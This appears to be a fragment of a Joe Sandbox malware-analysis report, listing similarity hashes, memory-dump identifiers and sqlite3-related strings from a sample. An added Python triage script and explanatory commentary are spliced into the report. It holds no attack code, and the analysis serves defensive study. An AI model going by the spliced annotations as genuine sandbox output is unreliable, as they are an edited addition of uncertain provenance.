                                                            • Instruction Fuzzy Hash: DB21D67262868681EB20EB14F4916EAE364FFA5788FC01136E74D4799DDF7CD215CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFileHeaderRaise
                                                            • String ID: csm
                                                            • API String ID: 2573137834-1018135373
                                                            • Opcode ID: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                            • Instruction ID: 1e5a5edb6d15036ba1751cb96005690155786f1d7dc9949cb6edb74bea5f2680
                                                            • Opcode Fuzzy Hash: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                            • Instruction Fuzzy Hash: 9E118E32A18B4482EB619B29F404269B7E4FB99B88F994230EBCC47B59DF7CC4518700
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                            • String ID: :
                                                            • API String ID: 2595371189-336475711
                                                            • Opcode ID: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                            • Instruction ID: e658934f62d2653758f10665b3c08920d8104fafff134d2b7aedc2079bd43052
                                                            • Opcode Fuzzy Hash: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                            • Instruction Fuzzy Hash: 1401B512D1C20B85EB20BF58B46227EE390EF6670CFC10135D74D46649DFBCE510CA24
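The "Source File" and "Associated" entries above are Joe Sandbox memory-dump identifiers. The script below is an added example, not Joe Sandbox code and not part of this report: it parses those identifiers, decodes the protection field with the winnt.h PAGE_* constants, and lists the executable image regions an analyst would hand to YARA or a disassembler first. The field layout (process index, run, dump id, region base, protection, state, region type, module index) is an assumption read off the identifiers on this page; Joe Sandbox does not document it here, so verify it against a fresh report before relying on it. The sample identifiers are copied from this page.

```python
"""Parse the Joe Sandbox memory-dump identifiers that appear as "Source File" /
"Associated" entries in this report, decode the protection field and list the
executable image regions worth feeding to YARA or a disassembler."""
import re
from dataclasses import dataclass

# Win32 page-protection constants from winnt.h (documented values).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}
MEM_IMAGE = 0x1000000  # winnt.h region type for a mapped PE image

# ASSUMPTION: the field layout below is inferred from the identifiers on this
# page, not documented by Joe Sandbox: process index . run . dump id (decimal)
# . region base . protection . state . region type . module index . "sdmp".
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<rtype>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process: int
    run: int
    dump_id: int
    base: int
    protect: int
    region_type: int
    module: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect, f"0x{self.protect:x}")

    @property
    def is_executable(self) -> bool:
        return self.protect in EXECUTABLE_PROTECTIONS

    @property
    def is_image(self) -> bool:
        return self.region_type == MEM_IMAGE


def parse_dump_name(entry: str) -> DumpRegion:
    """Parse one identifier; tolerates the 'Download File' link text that the
    HTML export glues onto each Associated line."""
    name = entry.strip().removesuffix("Download File").strip()
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {entry!r}")
    g = m.groupdict()
    return DumpRegion(
        process=int(g["proc"], 16),
        run=int(g["run"], 16),
        dump_id=int(g["dump"], 10),
        base=int(g["base"], 16),
        protect=int(g["prot"], 16),
        region_type=int(g["rtype"], 16),
        module=int(g["module"], 16),
    )


def executable_regions(entries) -> list:
    """Executable regions ordered by process then address; the same dump
    listed under several functions collapses to one entry."""
    regions = {parse_dump_name(e) for e in entries}
    return sorted((r for r in regions if r.is_executable),
                  key=lambda r: (r.process, r.base))


def triage_table(entries) -> list:
    """One (process, base, protection, is_image) row per distinct dump."""
    return [(r.process, f"{r.base:016X}", r.protection_name, r.is_image)
            for r in sorted({parse_dump_name(e) for e in entries},
                            key=lambda r: (r.process, r.base))]


# Identifiers copied from this report: process 0 is the submitted sample,
# process 2 is the module whose sqlite3 strings appear later in the report.
SAMPLE_DUMPS = [
    "00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File",
    "00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File",
    "00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File",
    "00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp",
    "00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmpDownload File",
    "00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmpDownload File",
    "00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmpDownload File",
    "00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmpDownload File",
]

if __name__ == "__main__":
    for r in executable_regions(SAMPLE_DUMPS):
        print(f"process {r.process} {r.base:016X} {r.protection_name:24} image={r.is_image}")
```

On this page's identifiers the decoding is self-consistent: the sample's own code region at 00007FF7B10F1000 comes out PAGE_EXECUTE_READ and its data regions PAGE_READWRITE, while the process 2 module has three PAGE_EXECUTE_READWRITE regions and one PAGE_EXECUTE_WRITECOPY region, which is what you would expect if an image section had been made writable after load and is the kind of region to inspect first.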

                                                            Execution Graph

                                                            Execution Coverage:4.5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:278
                                                            Total number of Limit Nodes:13
                                                            [Execution graph rendering omitted. The graph covers functions in the 7ff8e751xxxx-7ff8e755xxxx range of the process 2 module; the API calls it resolves are:]
                                                            • GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (functions 7ff8e755375c and 7ff8e751b51c)
                                                            • IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter (function 7ff8e7553bb0), with the same RtlCaptureContext / RtlLookupFunctionEntry / capture_previous_context path reached from 7ff8e751b020 and 7ff8e7553260
                                                            • DisableThreadLibraryCalls (function 7ff8e7553808)
                                                            • calls to out-of-module addresses the plugin did not resolve to a name: 00007FF8E73C6B10, 00007FF8E76ACD40, 00007FF906026A30, 00007FF8F9D619C0, 00007FF8E7637A5C
                                                            The first two sequences are the stock MSVC CRT security-cookie code (__security_init_cookie seeds the /GS cookie from exactly those four values; __report_gsfailure with capture_previous_context unwinds and hands a cookie mismatch to the unhandled-exception filter), and DisableThreadLibraryCalls is the usual DllMain prologue. None of these graph nodes is sample-specific behaviour; the 4.5% execution coverage above means most of this module's code was never reached during the run.

                                                            Control-flow Graph

                                                            [Control-flow graph rendering omitted; legend: Executed / Not Executed blocks. The graph is for the function at 7ff8e75166f0 in the process 2 module: 74 basic blocks (graph nodes 173-246) spanning 7ff8e75166f0-7ff8e7516ae1 plus an out-of-line error path at 7ff8e751cec0-7ff8e751cf08, calls into thunks at 7ff8e751e120-7ff8e751e7b0 and 7ff8e75163e0, and four calls to the unresolved out-of-module address 00007FF906026A30 (blocks 7ff8e7516828, 7ff8e7516846, 7ff8e7516864, 7ff8e7516882). The Similarity entry that follows lists this function's strings (sqlite3.Connection and the related error messages).]
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
                                                            • API String ID: 4164062812-3639599724
                                                            • Opcode ID: f5273bdf54cb06cd5d538bbbb3c294481d673bae0095213b7163fced7fe1f5f9
                                                            • Instruction ID: 2dc056f42cfdf6ea4c460d9cce074c6637a915f5161bac8b3554b6cc33a2ee52
                                                            • Opcode Fuzzy Hash: f5273bdf54cb06cd5d538bbbb3c294481d673bae0095213b7163fced7fe1f5f9
                                                            • Instruction Fuzzy Hash: D1917A25A08E4382FB608FA2EC5477C67A0EF44BC7F544436D96E476A9DF2CE589C302
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$executemany() can only execute DML statements.
                                                            • API String ID: 3568877910-2731538448
                                                            • Opcode ID: ee0d8454c5c9d970da0218faf46479518938e162efa0cbd301689f1702c18be9
                                                            • Instruction ID: 4429ffb3cbd051df525ce82934f92c307ac4858e505855ae84b6dc0564784075
                                                            • Opcode Fuzzy Hash: ee0d8454c5c9d970da0218faf46479518938e162efa0cbd301689f1702c18be9
                                                            • Instruction Fuzzy Hash: 66521336A08E4286EB549FA5E85433C63A0FF85BD7F240435CA2E476A4DF3DE885D742

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: sqlite3.connect$sqlite3.connect/handle
                                                            • API String ID: 3568877910-789065793
                                                            • Opcode ID: f65f1b4aa8fab3d01ff863b74949dc8337d09ceb04be27526f80d31c3e7b3a06
                                                            • Instruction ID: 51842e802e42ed75141cf6c499819fb2b99d5b6b8eeba0343fecdd910dc84286
                                                            • Opcode Fuzzy Hash: f65f1b4aa8fab3d01ff863b74949dc8337d09ceb04be27526f80d31c3e7b3a06
                                                            • Instruction Fuzzy Hash: EEA1FE36A09F8286EB608FA5E88436D73A4FB49BD6F144535CEAE42758DF3DE444C702

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773557891.00007FF8E7541000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF8E7540000, based on PE: true
                                                            • Associated: 00000002.00000002.1773494525.00007FF8E7540000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7564000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7569000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773687913.00007FF8E756A000.00000080.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7540000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007D619
                                                            • String ID: argument 'data'$contiguous buffer$decompress
                                                            • API String ID: 1596299418-2667845042
                                                            • Opcode ID: 6f5a67f52f9f9f4db097372ad2f0ef7fa7d88bdcbbd3075795eb13141a983109
                                                            • Instruction ID: 689e2425fbba3dcd7dc71458656ef0a062ee1df0ea74399e0ed3295dc46bab7a
                                                            • Opcode Fuzzy Hash: 6f5a67f52f9f9f4db097372ad2f0ef7fa7d88bdcbbd3075795eb13141a983109
                                                            • Instruction Fuzzy Hash: B5415C21A18B8282EA108B92EC4437D63A4FB49BD4F485136DE7E17B94EF3DF545C742
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773557891.00007FF8E7541000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF8E7540000, based on PE: true
                                                            • Associated: 00000002.00000002.1773494525.00007FF8E7540000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7564000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773557891.00007FF8E7569000.00000040.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773687913.00007FF8E756A000.00000080.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7540000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007D619ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 4166452831-0
                                                            • Opcode ID: 20b3d6c6e0832c53b5da1da8faa77a9c607007c578d0bea065c04d4a4ef01c4f
                                                            • Instruction ID: 408221948a4e08775155709377eab43b1892634c8d9443c509ed86a9c3bcae1e
                                                            • Opcode Fuzzy Hash: 20b3d6c6e0832c53b5da1da8faa77a9c607007c578d0bea065c04d4a4ef01c4f
                                                            • Instruction Fuzzy Hash: CE310A72609EC18AEB609FA1E8507ED73A4FB84788F44443ADA5E47B94DF3CD548C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: 73110fe95f56f2e246e2a39845b86ad545e02ac88c3586a09d39c753f47919d1
                                                            • Instruction ID: 94c5ff5346cb3bdd2050ff58380d2ced86076ad3d08f2cff8f20b8cd0d76ed8e
                                                            • Opcode Fuzzy Hash: 73110fe95f56f2e246e2a39845b86ad545e02ac88c3586a09d39c753f47919d1
                                                            • Instruction Fuzzy Hash: BF313D72609F828AEB609FA0E8507ED73A0FB84786F44443ADA5D47B98DF3CD648C711
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: You can only execute one statement at a time.$delete$insert$query string is too large$replace$the query contains a null character$update
                                                            • API String ID: 4164062812-1845899854
                                                            • Opcode ID: 85670fe99c256b4035ecc5ad04d73d73287a94dcff575db1ead4e4b6bb150e32
                                                            • Instruction ID: 0ed2d924cab7fd0acbe338b176641b51ddb16840700a41a9c4d2a60a1e07ab9f
                                                            • Opcode Fuzzy Hash: 85670fe99c256b4035ecc5ad04d73d73287a94dcff575db1ead4e4b6bb150e32
                                                            • Instruction Fuzzy Hash: 8C515C21A08E5382FA149BA6EC5477DA3A1AF84BD3F180535DD2E477A4DF3CE446C742
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 349153199-0
                                                            • Opcode ID: f75ecc2d8c1b9a871e020600fca4442604da94269eddfc7fb5995d09ef7590c1
                                                            • Instruction ID: 279a38671e0ffa4cdf88f3e6cef166f863abd215cd789ccd78e542746945c792
                                                            • Opcode Fuzzy Hash: f75ecc2d8c1b9a871e020600fca4442604da94269eddfc7fb5995d09ef7590c1
                                                            • Instruction Fuzzy Hash: B181BD61E0CA8786FA50ABE6DC413BD62A1AF957C2F154435DA3C437A2DF3DE8468703
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007
                                                            • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$argument 1$execute$factory must return a cursor, not %.100s$str
                                                            • API String ID: 3568877910-652842647
                                                            • Opcode ID: d27bf61ee4a98634d4261b76ce9cd54fc1edece76dedd19c8bdc2d1968ee5d44
                                                            • Instruction ID: 9140a29bdefaf646629f5105ecacf989b342c8034177e9a7d4b27b4496e70e62
                                                            • Opcode Fuzzy Hash: d27bf61ee4a98634d4261b76ce9cd54fc1edece76dedd19c8bdc2d1968ee5d44
                                                            • Instruction Fuzzy Hash: E7912232A08E4282EA559FA5DC8477C23A1FB48BD6F544431CA2E437A4DF7DE885D382
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: delete$insert$replace$update
                                                            • API String ID: 4164062812-310407209
                                                            • Opcode ID: 7c604190ea982bc6862ef712fed7f76d342510ff7bfb9a8620637aef0df7eee1
                                                            • Instruction ID: 37bb5a7b084d46ca6d318e0427280a944d54d05db5c53a322809c3855e77b930
                                                            • Opcode Fuzzy Hash: 7c604190ea982bc6862ef712fed7f76d342510ff7bfb9a8620637aef0df7eee1
                                                            • Instruction Fuzzy Hash: C921BF61A08E5382FB608F66EC1033C27A1EF41FC3F48407AC96D4A68ADE2CE556C342
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: delete$insert$replace$update
                                                            • API String ID: 4164062812-310407209
                                                            • Opcode ID: 55d76c71ca6707038f4485d3968fe73a8d602063b72aba7a2a39815a21053d33
                                                            • Instruction ID: 98bb43d7016d874bd7430881f62fa05007c603120fc640c1d6ad16f06cc8e3a6
                                                            • Opcode Fuzzy Hash: 55d76c71ca6707038f4485d3968fe73a8d602063b72aba7a2a39815a21053d33
                                                            • Instruction Fuzzy Hash: BD219C61A08E5382FA608B55EC1033C2791EF41BC3F488076C9AD4B68ADE2DE656C342
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773423131.00007FF8E7530000.00000080.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff8e7510000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: 00007F906026
                                                            • String ID: delete$insert$replace$update
                                                            • API String ID: 4164062812-310407209
                                                            • Opcode ID: 25b7c0b31f0d2a560fd390b79b5b474fca991390d289ae70a164b8cd878f4644
                                                            • Instruction ID: becf754b2eb8f3d24fabbc0da5e3af760cd7071907c7cb5798284282048bb629
                                                            • Opcode Fuzzy Hash: 25b7c0b31f0d2a560fd390b79b5b474fca991390d289ae70a164b8cd878f4644
                                                            • Instruction Fuzzy Hash: BD116A24A08E1382FA608B52EC4033D27A4AF44FC3F54443ACD6D8A695EF2CE656C342
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8E7510000, based on PE: true
                                                            • Associated: 00000002.00000002.1773243251.00007FF8E7510000.00000002.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E7528000.00000040.00000001.01000000.0000000A.sdmp
                                                            • Associated: 00000002.00000002.1773292284.00007FF8E752E000.00000040.00000001.01000000.0000000A.sdmp
